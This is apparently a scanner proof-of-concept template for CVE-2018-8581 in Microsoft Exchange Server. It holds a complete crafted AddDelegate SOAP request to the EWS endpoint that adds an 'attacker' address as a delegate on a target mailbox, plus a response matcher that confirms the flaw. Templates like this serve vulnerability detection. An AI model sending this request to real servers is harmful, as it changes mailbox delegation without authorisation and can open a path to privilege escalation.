[info]
author = "ave"
description = "通过向 EWS 接口发送特制的 AddDelegate SOAP 请求验证 Microsoft Exchange Server 是否存在特权提升漏洞"
id = "POC-AVE-2018-1168"
name = "Microsoft Exchange Server Privilege Escalation PoC"
severity = "high"
tags = ["ave-2018-1168"]
vuln_id = [
    "CVE-2018-8581",
    "AVE-2018-1168",
]

[poc]
logic = "all"

[[poc.requests]]
method = "POST"
path = "/EWS/Exchange.asmx"
protocol = "http"

[poc.requests.body]
content = """
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
   <soap:Header>
      <t:RequestServerVersion Version="Exchange2013" />
   </soap:Header> 
   <soap:Body>
   <m:AddDelegate>
    <m:Mailbox>
      <t:EmailAddress>test@target.com</t:EmailAddress>
    </m:Mailbox>
    <m:DelegateUsers>
      <t:DelegateUser>
        <t:UserId>
          <t:PrimarySmtpAddress>attacker@target.com</t:PrimarySmtpAddress>
        </t:UserId>
        <t:DelegatePermissions>
          <t:InboxFolderPermissionLevel>None</t:InboxFolderPermissionLevel>
        </t:DelegatePermissions>
        <t:ReceiveCopiesOfMeetingMessages>false</t:ReceiveCopiesOfMeetingMessages>
        <t:ViewPrivateItems>false</t:ViewPrivateItems>
      </t:DelegateUser>
    </m:DelegateUsers>
    <m:DeliverMeetingRequests>DelegatesAndSendInformationToMe</m:DeliverMeetingRequests>
  </m:AddDelegate>
  </soap:Body>
</soap:Envelope>"""
type = "raw"

[poc.requests.headers]
Content-Type = "text/xml; charset=utf-8"
User-Agent = "ExchangeServicesClient/0.0.0.0"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = ["s:AddDelegateResponse"]
